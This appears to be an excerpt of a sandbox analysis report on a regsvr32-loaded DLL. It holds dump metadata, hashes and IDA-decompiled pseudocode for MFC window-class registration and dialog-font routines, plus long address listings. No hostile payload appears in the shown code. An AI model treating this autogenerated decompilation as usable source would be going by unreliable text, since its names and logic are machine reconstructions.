                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1315500227-0
                                                                                                                                                                            • Opcode ID: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
                                                                                                                                                                            • Instruction ID: 106842abd73dbf2249684b53af78e8d9c6ae05809ec90903e9ae8d6f26667822
                                                                                                                                                                            • Opcode Fuzzy Hash: fd09e00dcf5aea0f889a5d5334f0ce8489c3ad9d17b5f7afd937dd6b6d05cc64
                                                                                                                                                                            • Instruction Fuzzy Hash: AA014F36500126BBDB12DF658C48EDE77ACEF15791F124114F911AA1A0DB30DA82CA94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E10012406(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				char* _v20;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				intOrPtr _t122;
                                                                                                                                                                            				void* _t128;
                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                            				signed int _t144;
                                                                                                                                                                            				signed int _t175;
                                                                                                                                                                            				signed int _t177;
                                                                                                                                                                            				signed int _t179;
                                                                                                                                                                            				signed int _t181;
                                                                                                                                                                            				signed int _t183;
                                                                                                                                                                            				signed int _t187;
                                                                                                                                                                            				void* _t190;
                                                                                                                                                                            				intOrPtr _t191;
                                                                                                                                                                            				signed int _t201;
                                                                                                                                                                            
                                                                                                                                                                            				_t190 = __ecx;
                                                                                                                                                                            				_t122 = E1000D5EC(__ebx, __edi, __esi, __eflags);
                                                                                                                                                                            				_v8 = _t122;
                                                                                                                                                                            				_t3 =  &_a4;
                                                                                                                                                                            				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                                                                                                                                            				if( *_t3 == 0) {
                                                                                                                                                                            					return 1;
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                            				_t201 = 0;
                                                                                                                                                                            				E100174D0(0,  &_v56, 0, 0x28);
                                                                                                                                                                            				_v52 = DefWindowProcA;
                                                                                                                                                                            				_t128 = E1000D5EC(__ebx, 0, 0, __eflags);
                                                                                                                                                                            				__eflags = _a4 & 0x00000001;
                                                                                                                                                                            				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                                                                            				_t130 =  *0x1005aa70; // 0x10003
                                                                                                                                                                            				_t187 = 8;
                                                                                                                                                                            				_v32 = _t130;
                                                                                                                                                                            				_v16 = _t187;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_push( &_v56);
                                                                                                                                                                            					_v56 = 0xb;
                                                                                                                                                                            					_v20 = "AfxWnd80s";
                                                                                                                                                                            					_t183 = E10012222(_t187, _t190, 0, 0, __eflags);
                                                                                                                                                                            					__eflags = _t183;
                                                                                                                                                                            					if(_t183 != 0) {
                                                                                                                                                                            						_t201 = 1;
                                                                                                                                                                            						__eflags = 1;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000020;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v56 = _v56 | 0x0000008b;
                                                                                                                                                                            					_push( &_v56);
                                                                                                                                                                            					_v20 = "AfxOleControl80s";
                                                                                                                                                                            					_t181 = E10012222(_t187, _t190, 0, _t201, __eflags);
                                                                                                                                                                            					__eflags = _t181;
                                                                                                                                                                            					if(_t181 != 0) {
                                                                                                                                                                            						_t201 = _t201 | 0x00000020;
                                                                                                                                                                            						__eflags = _t201;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000002;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_push( &_v56);
                                                                                                                                                                            					_v56 = 0;
                                                                                                                                                                            					_v20 = "AfxControlBar80s";
                                                                                                                                                                            					_v28 = 0x10;
                                                                                                                                                                            					_t179 = E10012222(_t187, _t190, 0, _t201, __eflags);
                                                                                                                                                                            					__eflags = _t179;
                                                                                                                                                                            					if(_t179 != 0) {
                                                                                                                                                                            						_t201 = _t201 | 0x00000002;
                                                                                                                                                                            						__eflags = _t201;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000004;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v56 = _t187;
                                                                                                                                                                            					_v28 = 0;
                                                                                                                                                                            					_t177 = E100123C5(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                                                                                                                                            					__eflags = _t177;
                                                                                                                                                                            					if(_t177 != 0) {
                                                                                                                                                                            						_t201 = _t201 | 0x00000004;
                                                                                                                                                                            						__eflags = _t201;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & _t187;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v56 = 0xb;
                                                                                                                                                                            					_v28 = 6;
                                                                                                                                                                            					_t175 = E100123C5(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                                                                                                                                            					__eflags = _t175;
                                                                                                                                                                            					if(_t175 != 0) {
                                                                                                                                                                            						_t201 = _t201 | _t187;
                                                                                                                                                                            						__eflags = _t201;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000010;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0xff;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
                                                                                                                                                                            					_t48 =  &_a4;
                                                                                                                                                                            					 *_t48 = _a4 & 0xffffc03f;
                                                                                                                                                                            					__eflags =  *_t48;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000040;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x10;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000080;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 2;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000100;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = _t187;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000200;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x20;
                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000400;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 1;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000800;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x40;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00001000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 4;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00002000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x80;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00004000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x800;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00008000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x400;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00010000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x200;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00020000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x100;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00040000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x8000;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t191 = _v8;
                                                                                                                                                                            				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                                                                                                                                            				_t139 =  *(_t191 + 0x18);
                                                                                                                                                                            				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                                                                                                                                            				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                                                                                                                                            					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                                                                                                                                            					_t201 = _t201 | 0x00000010;
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                            				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                                                                                                                                            				__eflags = _t144;
                                                                                                                                                                            				return _t144;
                                                                                                                                                                            			}



























                                                                                                                                                                            0x10012406
                                                                                                                                                                            0x1001240c
                                                                                                                                                                            0x10012411
                                                                                                                                                                            0x10012419
                                                                                                                                                                            0x10012419
                                                                                                                                                                            0x1001241c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10012420
                                                                                                                                                                            0x10012426
                                                                                                                                                                            0x10012427
                                                                                                                                                                            0x10012428
                                                                                                                                                                            0x10012432
                                                                                                                                                                            0x10012434
                                                                                                                                                                            0x10012441
                                                                                                                                                                            0x10012444
                                                                                                                                                                            0x10012449
                                                                                                                                                                            0x10012452
                                                                                                                                                                            0x10012455
                                                                                                                                                                            0x1001245a
                                                                                                                                                                            0x1001245b
                                                                                                                                                                            0x1001245e
                                                                                                                                                                            0x10012461
                                                                                                                                                                            0x10012466
                                                                                                                                                                            0x10012467
                                                                                                                                                                            0x1001246e
                                                                                                                                                                            0x10012475
                                                                                                                                                                            0x1001247a
                                                                                                                                                                            0x1001247c
                                                                                                                                                                            0x1001247e
                                                                                                                                                                            0x1001247e
                                                                                                                                                                            0x1001247e
                                                                                                                                                                            0x1001247c
                                                                                                                                                                            0x1001247f
                                                                                                                                                                            0x10012483
                                                                                                                                                                            0x10012485
                                                                                                                                                                            0x1001248f
                                                                                                                                                                            0x10012490
                                                                                                                                                                            0x10012497
                                                                                                                                                                            0x1001249c
                                                                                                                                                                            0x1001249e
                                                                                                                                                                            0x100124a0
                                                                                                                                                                            0x100124a0
                                                                                                                                                                            0x100124a0
                                                                                                                                                                            0x1001249e
                                                                                                                                                                            0x100124a3
                                                                                                                                                                            0x100124a7
                                                                                                                                                                            0x100124ac
                                                                                                                                                                            0x100124ad
                                                                                                                                                                            0x100124b0
                                                                                                                                                                            0x100124b7
                                                                                                                                                                            0x100124be
                                                                                                                                                                            0x100124c3
                                                                                                                                                                            0x100124c5
                                                                                                                                                                            0x100124c7
                                                                                                                                                                            0x100124c7
                                                                                                                                                                            0x100124c7
                                                                                                                                                                            0x100124c5
                                                                                                                                                                            0x100124ca
                                                                                                                                                                            0x100124ce
                                                                                                                                                                            0x100124de
                                                                                                                                                                            0x100124e1
                                                                                                                                                                            0x100124e4
                                                                                                                                                                            0x100124e9
                                                                                                                                                                            0x100124eb
                                                                                                                                                                            0x100124ed
                                                                                                                                                                            0x100124ed
                                                                                                                                                                            0x100124ed
                                                                                                                                                                            0x100124eb
                                                                                                                                                                            0x100124f0
                                                                                                                                                                            0x100124f3
                                                                                                                                                                            0x10012503
                                                                                                                                                                            0x1001250a
                                                                                                                                                                            0x10012511
                                                                                                                                                                            0x10012516
                                                                                                                                                                            0x10012518
                                                                                                                                                                            0x1001251a
                                                                                                                                                                            0x1001251a
                                                                                                                                                                            0x1001251a
                                                                                                                                                                            0x10012518
                                                                                                                                                                            0x1001251c
                                                                                                                                                                            0x10012520
                                                                                                                                                                            0x1001252b
                                                                                                                                                                            0x10012537
                                                                                                                                                                            0x10012539
                                                                                                                                                                            0x10012539
                                                                                                                                                                            0x10012539
                                                                                                                                                                            0x10012539
                                                                                                                                                                            0x10012540
                                                                                                                                                                            0x10012544
                                                                                                                                                                            0x1001254c
                                                                                                                                                                            0x10012558
                                                                                                                                                                            0x10012558
                                                                                                                                                                            0x10012558
                                                                                                                                                                            0x1001255a
                                                                                                                                                                            0x1001255e
                                                                                                                                                                            0x10012569
                                                                                                                                                                            0x10012575
                                                                                                                                                                            0x10012575
                                                                                                                                                                            0x10012575
                                                                                                                                                                            0x1001257c
                                                                                                                                                                            0x1001257f
                                                                                                                                                                            0x10012586
                                                                                                                                                                            0x1001258e
                                                                                                                                                                            0x1001258e
                                                                                                                                                                            0x1001258e
                                                                                                                                                                            0x10012595
                                                                                                                                                                            0x10012598
                                                                                                                                                                            0x1001259f
                                                                                                                                                                            0x100125ab
                                                                                                                                                                            0x100125ab
                                                                                                                                                                            0x100125ab
                                                                                                                                                                            0x100125b2
                                                                                                                                                                            0x100125b5
                                                                                                                                                                            0x100125bc
                                                                                                                                                                            0x100125c8
                                                                                                                                                                            0x100125c8
                                                                                                                                                                            0x100125c8
                                                                                                                                                                            0x100125cf
                                                                                                                                                                            0x100125d2
                                                                                                                                                                            0x100125d9
                                                                                                                                                                            0x100125e5
                                                                                                                                                                            0x100125e5
                                                                                                                                                                            0x100125e5
                                                                                                                                                                            0x100125ec
                                                                                                                                                                            0x100125ef
                                                                                                                                                                            0x100125f6
                                                                                                                                                                            0x10012602
                                                                                                                                                                            0x10012602
                                                                                                                                                                            0x10012602
                                                                                                                                                                            0x10012609
                                                                                                                                                                            0x1001260c
                                                                                                                                                                            0x10012613
                                                                                                                                                                            0x1001261f
                                                                                                                                                                            0x1001261f
                                                                                                                                                                            0x1001261f
                                                                                                                                                                            0x10012626
                                                                                                                                                                            0x10012629
                                                                                                                                                                            0x10012630
                                                                                                                                                                            0x10012638
                                                                                                                                                                            0x10012638
                                                                                                                                                                            0x10012638
                                                                                                                                                                            0x1001263f
                                                                                                                                                                            0x10012642
                                                                                                                                                                            0x10012649
                                                                                                                                                                            0x10012651
                                                                                                                                                                            0x10012651
                                                                                                                                                                            0x10012651
                                                                                                                                                                            0x10012658
                                                                                                                                                                            0x1001265b
                                                                                                                                                                            0x10012662
                                                                                                                                                                            0x1001266e
                                                                                                                                                                            0x1001266e
                                                                                                                                                                            0x1001266e
                                                                                                                                                                            0x10012675
                                                                                                                                                                            0x10012678
                                                                                                                                                                            0x1001267f
                                                                                                                                                                            0x1001268b
                                                                                                                                                                            0x1001268b
                                                                                                                                                                            0x1001268b
                                                                                                                                                                            0x10012692
                                                                                                                                                                            0x10012695
                                                                                                                                                                            0x1001269c
                                                                                                                                                                            0x100126a4
                                                                                                                                                                            0x100126a4
                                                                                                                                                                            0x100126a4
                                                                                                                                                                            0x100126a6
                                                                                                                                                                            0x100126a9
                                                                                                                                                                            0x100126ac
                                                                                                                                                                            0x100126b8
                                                                                                                                                                            0x100126ba
                                                                                                                                                                            0x100126bf
                                                                                                                                                                            0x100126c2
                                                                                                                                                                            0x100126c2
                                                                                                                                                                            0x100126c2
                                                                                                                                                                            0x100126d1
                                                                                                                                                                            0x100126d3
                                                                                                                                                                            0x100126d3
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                            • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                                                                            • API String ID: 2102423945-4122032997
                                                                                                                                                                            • Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
                                                                                                                                                                            • Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
                                                                                                                                                                            • Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strlen$IconLoad_memset
                                                                                                                                                                            • String ID: 127.0.0.1
                                                                                                                                                                            • API String ID: 858515944-3619153832
                                                                                                                                                                            • Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
                                                                                                                                                                            • Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
                                                                                                                                                                            • Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
                                                                                                                                                                            • Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                            			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				short _v72;
                                                                                                                                                                            				char* _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int* _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            				short* _t70;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				signed int _t81;
                                                                                                                                                                            				signed int* _t83;
                                                                                                                                                                            				short* _t84;
                                                                                                                                                                            				void* _t91;
                                                                                                                                                                            				signed int* _t98;
                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                            				void** _t100;
                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                            				void* _t107;
                                                                                                                                                                            
                                                                                                                                                                            				_t101 = __esi;
                                                                                                                                                                            				_t97 = __edx;
                                                                                                                                                                            				_t82 = __ebx;
                                                                                                                                                                            				_t54 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v8 = _t54 ^ _t106;
                                                                                                                                                                            				_t100 = __ecx;
                                                                                                                                                                            				_v76 = _a4;
                                                                                                                                                                            				if(__ecx[1] != 0) {
                                                                                                                                                                            					_push(__ebx);
                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                            					_t83 = GlobalLock( *__ecx);
                                                                                                                                                                            					_v84 = _t83;
                                                                                                                                                                            					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                                                                                                                                            					_v80 = E100146B2(_t83);
                                                                                                                                                                            					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                                                                                                                                            					_v92 = _t102;
                                                                                                                                                                            					if(_v88 == 0) {
                                                                                                                                                                            						 *_t83 =  *_t83 | 0x00000040;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t83[3] = _t83[3] | 0x00000040;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(lstrlenA(_v76) >= 0x20) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                                                                                            						_v76 = _t97;
                                                                                                                                                                            						if(_t97 < _t102) {
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t70 = E100146DD(_t83);
                                                                                                                                                                            							_t91 = 0;
                                                                                                                                                                            							_t84 = _t70;
                                                                                                                                                                            							if(_v80 != 0) {
                                                                                                                                                                            								_t81 = E100169F6(_t84 + _t102);
                                                                                                                                                                            								_t97 = _v76;
                                                                                                                                                                            								_t91 = _t102 + 2 + _t81 * 2;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t33 = _t97 + 3; // 0x3
                                                                                                                                                                            							_t98 = _v84;
                                                                                                                                                                            							_t36 = _t84 + 3; // 0x10002
                                                                                                                                                                            							_t72 = _t91 + _t36 & 0xfffffffc;
                                                                                                                                                                            							_t104 = _t84 + _t33 & 0xfffffffc;
                                                                                                                                                                            							_v80 = _t72;
                                                                                                                                                                            							if(_v88 == 0) {
                                                                                                                                                                            								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_v76 == _t91 || _t99 <= 0) {
                                                                                                                                                                            								L17:
                                                                                                                                                                            								 *_t84 = _a8;
                                                                                                                                                                            								_t97 =  &_v72;
                                                                                                                                                                            								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                                                                                                                                            								_t100[1] = _t100[1] + _t104 - _v80;
                                                                                                                                                                            								GlobalUnlock( *_t100);
                                                                                                                                                                            								_t100[2] = _t100[2] & 0x00000000;
                                                                                                                                                                            								_t66 = 1;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t97 = _t100[1];
                                                                                                                                                                            								_t95 = _t97 - _t72 + _v84;
                                                                                                                                                                            								if(_t97 - _t72 + _v84 <= _t97) {
                                                                                                                                                                            									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                                                                                                                                            									_t107 = _t107 + 0x10;
                                                                                                                                                                            									goto L17;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L15;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_pop(_t101);
                                                                                                                                                                            					_pop(_t82);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                                                                                                                                            			}



























                                                                                                                                                                            0x1001486f
                                                                                                                                                                            0x1001486f
                                                                                                                                                                            0x1001486f
                                                                                                                                                                            0x10014875
                                                                                                                                                                            0x1001487c
                                                                                                                                                                            0x10014883
                                                                                                                                                                            0x10014889
                                                                                                                                                                            0x1001488c
                                                                                                                                                                            0x10014895
                                                                                                                                                                            0x10014896
                                                                                                                                                                            0x1001489f
                                                                                                                                                                            0x100148ad
                                                                                                                                                                            0x100148b0
                                                                                                                                                                            0x100148b8
                                                                                                                                                                            0x100148ce
                                                                                                                                                                            0x100148d0
                                                                                                                                                                            0x100148d3
                                                                                                                                                                            0x100148db
                                                                                                                                                                            0x100148d5
                                                                                                                                                                            0x100148d5
                                                                                                                                                                            0x100148d5
                                                                                                                                                                            0x100148ea
                                                                                                                                                                            0x10014968
                                                                                                                                                                            0x10014968
                                                                                                                                                                            0x100148ec
                                                                                                                                                                            0x10014901
                                                                                                                                                                            0x10014906
                                                                                                                                                                            0x10014909
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001490b
                                                                                                                                                                            0x1001490c
                                                                                                                                                                            0x10014912
                                                                                                                                                                            0x10014917
                                                                                                                                                                            0x10014919
                                                                                                                                                                            0x1001491f
                                                                                                                                                                            0x10014924
                                                                                                                                                                            0x10014928
                                                                                                                                                                            0x10014928
                                                                                                                                                                            0x1001492c
                                                                                                                                                                            0x10014930
                                                                                                                                                                            0x10014933
                                                                                                                                                                            0x10014937
                                                                                                                                                                            0x1001493a
                                                                                                                                                                            0x10014941
                                                                                                                                                                            0x10014944
                                                                                                                                                                            0x1001494c
                                                                                                                                                                            0x10014946
                                                                                                                                                                            0x10014946
                                                                                                                                                                            0x10014946
                                                                                                                                                                            0x10014953
                                                                                                                                                                            0x10014978
                                                                                                                                                                            0x1001497f
                                                                                                                                                                            0x10014988
                                                                                                                                                                            0x10014990
                                                                                                                                                                            0x1001499d
                                                                                                                                                                            0x100149a0
                                                                                                                                                                            0x100149a6
                                                                                                                                                                            0x100149ac
                                                                                                                                                                            0x1001495a
